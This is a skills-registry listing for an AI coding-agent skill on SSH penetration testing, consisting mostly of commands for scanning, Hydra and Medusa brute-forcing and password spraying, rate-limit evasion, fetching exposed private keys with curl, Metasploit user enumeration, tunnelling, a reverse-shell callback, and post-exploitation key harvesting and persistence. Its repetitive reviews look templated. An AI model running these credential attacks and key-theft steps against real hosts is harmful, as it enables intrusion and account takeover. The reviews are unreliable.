explainx.ainewsletter3.4k
Testing

ssh-penetration-testing

davila7/claude-code-templates · updated Apr 8, 2026

MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.

$npx skills add https://github.com/davila7/claude-code-templates --skill ssh-penetration-testing
0 commentsdiscussion
summary

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

skill.md

SSH Penetration Testing

Purpose

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

Prerequisites

Required Tools

  • Nmap with SSH scripts
  • Hydra or Medusa for brute-forcing
  • ssh-audit for configuration analysis
  • Metasploit Framework
  • Python with Paramiko library

Required Knowledge

  • SSH protocol fundamentals
  • Public/private key authentication
  • Port forwarding concepts
  • Linux command-line proficiency

Outputs and Deliverables

  1. SSH Enumeration Report - Versions, algorithms, configurations
  2. Credential Assessment - Weak passwords, default credentials
  3. Vulnerability Assessment - Known CVEs, misconfigurations
  4. Tunnel Documentation - Port forwarding configurations

Core Workflow

Phase 1: SSH Service Discovery

Identify SSH services on target networks:

# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100

Phase 2: SSH Enumeration

Gather detailed information about SSH services:

# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100

Phase 3: SSH Configuration Auditing

Identify weak configurations:

# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions

Key configuration weaknesses to identify:

  • Weak key exchange algorithms (diffie-hellman-group1-sha1)
  • Weak ciphers (arcfour, 3des-cbc)
  • Weak MACs (hmac-md5, hmac-sha1-96)
  • Deprecated protocol versions

Phase 4: Credential Attacks

Brute-Force with Hydra

# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Brute-Force with Medusa

# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222

Password Spraying

# Test common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done

Phase 5: Key-Based Authentication Testing

Test for weak or exposed keys:

# Attempt login with found private key
ssh -i id_rsa [email protected]

# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa [email protected]

# Force password authentication
ssh -o PreferredAuthentications=password [email protected]

# Try common key names
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
    ssh -i "$key" [email protected]
done

Check for exposed keys:

# Common locations for private keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# Web-accessible keys (check with curl/wget)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz

Phase 6: Vulnerability Exploitation

Search for known vulnerabilities:

# Search for exploits
searchsploit openssh
searchsploit openssh 7.2

# Common SSH vulnerabilities
# CVE-2018-15473 - Username enumeration
# CVE-2016-0777 - Roaming vulnerability
# CVE-2016-0778 - Buffer overflow

# Metasploit enumeration
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# Username enumeration (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run

Phase 7: SSH Tunneling and Port Forwarding

Local Port Forwarding

Forward local port to remote service:

# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server

# Access internal web server through SSH
ssh -L 8080:192.168.1.50:80 [email protected]
# Now access http://localhost:8080

# Access internal database
ssh -L 3306:192.168.1.50:3306 [email protected]

# Multiple forwards
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 [email protected]

Remote Port Forwarding

Expose local service to remote network:

# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server

# Expose local web server to remote
ssh -R 8080:localhost:80 [email protected]
# Remote can access via localhost:8080

# Reverse shell callback
ssh -R 4444:localhost:4444 [email protected]

Dynamic Port Forwarding (SOCKS Proxy)

Create SOCKS proxy for network pivoting:

# Create SOCKS proxy on local port 1080
ssh -D 1080 [email protected]

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24

# Browser configuration
# Set SOCKS proxy to localhost:1080

ProxyJump (Jump Hosts)

Chain through multiple SSH servers:

# Jump through intermediate host
ssh -J user1@jump_host user2@target_host

# Multiple jumps
ssh -J user1@jump1,user2@jump2 user3@target

# With SSH config
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump [email protected]

Phase 8: Post-Exploitation

Activities after gaining SSH access:

# Check sudo privileges
sudo -l

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Check SSH directory
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

# Add persistence (add your key)

how to use ssh-penetration-testing
How to use ssh-penetration-testing on Cursor
AI-first code editor with Composer
1
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
  • Cursor installed and configured on your development machine
  • Node.js version 16.0+ with npm package manager (verify with node --version)
  • Active project directory or workspace where you want to add ssh-penetration-testing
2
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
$npx skills add https://github.com/davila7/claude-code-templates --skill ssh-penetration-testing
The skills CLI fetches ssh-penetration-testing from GitHub repository davila7/claude-code-templates and configures it for Cursor.
3
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
◆ Which agents do you want to install to?
│ ── Universal (.agents/skills) ── always included ────
│   • Amp
│   • Antigravity
│   • Cline
│   • Codex
│ ●Cursor(selected)
│   • Cursor
│   • Windsurf
4
Verify installation
Confirm successful installation by checking the skill directory location:
.cursor/skills/ssh-penetration-testing
Reload or restart Cursor to activate ssh-penetration-testing. Access the skill through slash commands (e.g., /ssh-penetration-testing) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
Additional Resources
View source code on GitHubSkills CLI documentationLearn more about CursorWhat are agent skills?

List & Monetize Your Skill

Submit your Claude Code skill and start earning

GET_STARTED →

Use Cases

Task Automation & Efficiency

Automate repetitive workflows and reduce manual effort

Example

Generate reports, summarize documents, draft communications

Save 3-5 hours per week on routine tasks

Knowledge Enhancement

Learn new skills, understand complex topics, get expert guidance

Example

Explain concepts, provide examples, suggest learning resources

Accelerate learning and skill development by 2x

Quality Improvement

Enhance output quality through reviews, suggestions, and refinements

Example

Review drafts, suggest improvements, catch errors

Improve work quality by 30-40% with less effort

Implementation Guide

Prerequisites

  • Claude Desktop or compatible AI client with skill support
  • Clear understanding of task or problem to solve
  • Willingness to iterate and refine outputs

Time Estimate

15-45 minutes depending on use case complexity

Installation Steps

  1. 1.Install skill using provided installation command
  2. 2.Test with simple use case relevant to your work
  3. 3.Evaluate output quality and relevance
  4. 4.Iterate on prompts to improve results
  5. 5.Integrate into regular workflow if valuable

Common Pitfalls

  • Expecting perfect results without iteration
  • Not providing enough context in prompts
  • Using skill for tasks outside its intended scope
  • Accepting outputs without review and validation

Best Practices

✓ Do

  • +Start with clear, specific prompts
  • +Provide relevant context and constraints
  • +Review and refine all outputs before using
  • +Iterate to improve output quality
  • +Document successful prompt patterns

✗ Don't

  • Don't use without understanding skill limitations
  • Don't skip validation of outputs
  • Don't share sensitive information in prompts
  • Don't expect skill to replace human judgment

💡 Pro Tips

  • Be specific about desired format and style
  • Ask for multiple options to choose from
  • Request explanations to understand reasoning
  • Combine AI efficiency with human expertise

When to Use This

✓ Use When

Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.

✗ Avoid When

Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.

Learning Path

  1. 1Familiarize yourself with skill capabilities and limitations
  2. 2Start with low-risk, non-critical tasks
  3. 3Progress to more complex and valuable use cases
  4. 4Build expertise through regular use and experimentation

Discussion

Product Hunt–style comments (not star reviews)
  • No comments yet — start the thread.
general reviews

Ratings

4.731 reviews
  • Shikha Mishra· Dec 24, 2024

    ssh-penetration-testing fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.

  • Henry Chen· Dec 24, 2024

    We added ssh-penetration-testing from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.

  • Dev Harris· Dec 24, 2024

    Keeps context tight: ssh-penetration-testing is the kind of skill you can hand to a new teammate without a long onboarding doc.

  • Hana Harris· Dec 20, 2024

    ssh-penetration-testing fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.

  • Carlos Rahman· Nov 19, 2024

    ssh-penetration-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.

  • Hana Smith· Nov 15, 2024

    ssh-penetration-testing has been reliable in day-to-day use. Documentation quality is above average for community skills.

  • Hana Reddy· Oct 6, 2024

    Solid pick for teams standardizing on skills: ssh-penetration-testing is focused, and the summary matches what you get after install.

  • Rahul Santra· Sep 21, 2024

    Registry listing for ssh-penetration-testing matched our evaluation — installs cleanly and behaves as described in the markdown.

  • Hana Yang· Sep 21, 2024

    ssh-penetration-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.

  • Pratham Ware· Aug 12, 2024

    ssh-penetration-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.

showing 1-10 of 31

1 / 4